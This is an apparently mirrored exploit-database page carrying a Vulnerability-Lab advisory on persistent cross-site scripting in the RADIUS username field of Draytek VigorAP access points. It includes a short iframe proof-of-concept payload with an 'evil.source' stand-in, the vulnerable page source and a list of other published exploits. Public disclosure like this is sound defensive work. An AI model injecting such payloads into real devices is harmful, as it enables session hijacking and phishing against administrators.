Search for hundreds of thousands of exploits

"Draytek VigorAP 1000C - Persistent Cross-Site Scripting"

Author

Exploit author

Vulnerability-Lab

Platform

Exploit platform

hardware

Release date

Exploit published date

2020-05-07

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
# Title: Draytek VigorAP 1000C - Persistent Cross-Site Scripting
# Author: Vulnerability Laboratory
# Date: 2020-05-07
# Vendor: https://www.draytek.com/
# Software: https://www.draytek.com/products/vigorap-903/
# CVE: N/A

Document Title:
===============
Draytek VigorAP - (RADIUS) Persistent XSS Vulnerability


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2244


Common Vulnerability Scoring System:
====================================
4


Product & Service Introduction:
===============================
https://www.draytek.com/
https://www.draytek.com/products/vigorap-903/



Affected Product(s):
====================
Draytek
[+] VigorAP 1000C | 1.3.2
[+] VigorAP 700 | 1.11
[+] VigorAP 710 | 1.2.5
[+] VigorAP 800 | 1.1.4
[+] VigorAP 802 | 1.3.2
[+] VigorAP 810 | 1.2.5
[+] VigorAP 900 | 1.2.0
[+] VigorAP 902 | 1.2.5
[+] VigorAP 903 | 1.3.1
[+] VigorAP 910C | 1.2.5
[+] VigorAP 912C | 1.3.2
[+] VigorAP 918R Series | 1.3.2
[+] VigorAP 920R Series | 1.3.0
[+] All other VigorAP Series with Radius Module


Vulnerability Disclosure Timeline:
==================================
2020-05-07: Public Disclosure (Vulnerability Laboratory)


Technical Details & Description:
================================
A persistent input validation vulnerability has been discovered in the
official Draytek VigorAP product series application.
The vulnerability allows remote attackers to inject own malicious script
codes with persistent attack vector to compromise
browser to web-application requests from the application-side.

The persistent input validation web vulnerability is located in the
username input field of the RADIUS Setting - RADIUS Server
Configuration module. Remote attackers with limited access are able to
inject own malicious persistent script codes as username.
Other privileged user accounts execute on preview of the modules
context. The request method to inject is POST and the attack
vector is located on the application-side.

Successful exploitation of the vulnerability results in session
hijacking, persistent phishing attacks, persistent external
redirects to malicious source and persistent manipulation of affected
application modules.

Vulnerable Module(s):
[+] RADIUS Setting - RADIUS Server Configuration - Users Profile

Vulnerable Input(s):
[+] Username


Proof of Concept (PoC):
=======================
The persistent input validation web vulnerabilities can be exploited by
remote attackers with low privileged user account and low user interaction.
For security demonstration or to reproduce the security vulnerability
follow the provided information an steΓΌs below to continue.


PoC: Payload
<iframe src=evil.source onload=alert(document.domain)></iframe>


PoC: Vulnerable Source (http:/vigorAP.localhost:50902/home.asp)
<div class="box">
<table width="652" cellspacing="1" cellpadding="2">
<tbody><tr>
<th id="userName">Username</th>
<th id="passwd">Password</th>
<th id="confirmPasswd">Confirm Password</th>
<th id="configure">Configure</th>
</tr>
<tr>
<td><input maxlength="24" type="text" id="addusr"></td>
<td><input maxlength="24" type="password" id="addpwd"></td>
<td><input maxlength="24" type="password" id="addpwdcfm"></td>
<td><input type="button" id="btnAddUser" value="Add" class="add"
onclick="addUser()">
<input type="button" id="btnCancelUser" value="Cancel" class="add"
onclick="cancelUser()"></td>
</tr>
</tbody></table>
<table class="content" width="652" cellspacing="1" cellpadding="2">
<tbody id="usersTb">
<tr>
<th id="userNo">NO.</th>
<th id="userNames">Username</th>
<th id="userSelect">Select</th>
</tr>
<tr><td>1</td><td>test</td><td><input type="checkbox"><input
type="hidden" value="test"></td></tr>
tr><td>2</td><td><iframe src=evil.source
onload=alert(document.domain)></iframe></td><td><input type="checkbox">
<input type="hidden" value="asd"></td></tr></tbody>
</table>
<p><input type="button" id="btnDelSelUser" value="Delete Selected"
class="del" onclick="delSelUser()">
<input type="button" id="btnDelAllUser" value="Delete All" class="del"
onclick="delAllUser()">
</p></div>


Reference(s):
http:/vigorAP.localhost:50902/
http:/vigorAP.localhost:50902/home.asp


Credits & Authors:
==================
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.


-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
Release DateTitleTypePlatformAuthor
2020-06-01"QuickBox Pro 2.1.8 - Authenticated Remote Code Execution"webappsphps1gh
2020-06-01"Wordpress Plugin BBPress 2.5 - Unauthenticated Privilege Escalation"webappsphp"Raphael Karger"
2020-06-01"VMware vCenter Server 6.7 - Authentication Bypass"webappsmultiplePhotubias
2020-05-29"Crystal Shard http-protection 0.2.0 - IP Spoofing Bypass"webappsmultiple"Halis Duraki"
2020-05-29"WordPress Plugin Multi-Scheduler 1.0.0 - Cross-Site Request Forgery (Delete User)"webappsphpUnD3sc0n0c1d0
2020-05-28"Online-Exam-System 2015 - 'fid' SQL Injection"webappsphp"Berk Dusunur"
2020-05-28"EyouCMS 1.4.6 - Persistent Cross-Site Scripting"webappsphp"China Banking and Insurance Information Technology Management Co."
2020-05-28"QNAP QTS and Photo Station 6.0.3 - Remote Command Execution"webappsphpTh3GundY
2020-05-28"NOKIA VitalSuite SPM 2020 - 'UserName' SQL Injection"webappsmultiple"Berk Dusunur"
2020-05-27"LimeSurvey 4.1.11 - 'Permission Roles' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
Release DateTitleTypePlatformAuthor
2020-05-13"Tryton 5.4 - Persistent Cross-Site Scripting"webappsphpVulnerability-Lab
2020-05-13"Sellacious eCommerce 4.6 - Persistent Cross-Site Scripting"webappsphpVulnerability-Lab
2020-05-11"Sentrifugo CMS 3.2 - Persistent Cross-Site Scripting"webappsphpVulnerability-Lab
2020-05-11"OpenZ ERP 3.6.60 - Persistent Cross-Site Scripting"webappsphpVulnerability-Lab
2020-05-07"Draytek VigorAP 1000C - Persistent Cross-Site Scripting"webappshardwareVulnerability-Lab
2020-05-05"Fishing Reservation System 7.5 - 'uid' SQL Injection"webappsphpVulnerability-Lab
2020-05-01"Super Backup 2.0.5 for iOS - Directory Traversal"webappsiosVulnerability-Lab
2020-05-01"HardDrive 2.1 for iOS - Arbitrary File Upload"webappsiosVulnerability-Lab
2020-04-29"Easy Transfer 1.7 for iOS - Directory Traversal"webappsiosVulnerability-Lab
2020-04-29"Internet Download Manager 6.37.11.1 - Stack Buffer Overflow (PoC)"localwindowsVulnerability-Lab
2020-04-23"Sky File 2.1.0 iOS - Directory Traversal"webappsiosVulnerability-Lab
2020-04-22"Mahara 19.10.2 CMS - Persistent Cross-Site Scripting"webappslinuxVulnerability-Lab
2020-04-20"Fork CMS 5.8.0 - Persistent Cross-Site Scripting"webappsphpVulnerability-Lab
2020-04-17"TAO Open Source Assessment Platform 3.3.0 RC02 - HTML Injection"webappsphpVulnerability-Lab
2020-04-17"Playable 9.18 iOS - Persistent Cross-Site Scripting"webappsiosVulnerability-Lab
2020-04-15"Macs Framework 1.14f CMS - Persistent Cross-Site Scripting"webappsphpVulnerability-Lab
2020-04-15"SeedDMS 5.1.18 - Persistent Cross-Site Scripting"webappsphpVulnerability-Lab
2020-04-15"SuperBackup 2.0.5 for iOS - Persistent Cross-Site Scripting"webappsiosVulnerability-Lab
2020-04-15"File Transfer iFamily 2.1 - Directory Traversal"webappsiosVulnerability-Lab
2020-04-15"AirDisk Pro 5.5.3 for iOS - Persistent Cross-Site Scripting"webappsiosVulnerability-Lab
2019-12-19"Deutsche Bahn Ticket Vending Machine Local Kiosk - Privilege Escalation"webappshardwareVulnerability-Lab
2019-08-14"TortoiseSVN 1.12.1 - Remote Code Execution"webappswindowsVulnerability-Lab
2018-01-23"CentOS Web Panel 0.9.8.12 - 'row_id' / 'domain' SQL Injection"webappsphpVulnerability-Lab
2018-01-21"CentOS Web Panel 0.9.8.12 - Multiple Vulnerabilities"webappsphpVulnerability-Lab
2018-01-21"Shopware 5.2.5/5.3 - Cross-Site Scripting"webappsjsonVulnerability-Lab
2018-01-15"Flash Operator Panel 2.31.03 - Command Execution"webappsphpVulnerability-Lab
2018-01-12"Kentico CMS 11.0 - Buffer Overflow"doswindowsVulnerability-Lab
2018-01-08"Photos in Wifi 1.0.1 - Path Traversal"webappsiosVulnerability-Lab
2018-01-08"SonicWall NSA 6600/5600/4600/3600/2600/250M - Multiple Vulnerabilities"webappshardwareVulnerability-Lab
2017-09-04"CodeMeter 6.50 - Cross-Site Scripting"webappsmultipleVulnerability-Lab
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/48436/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.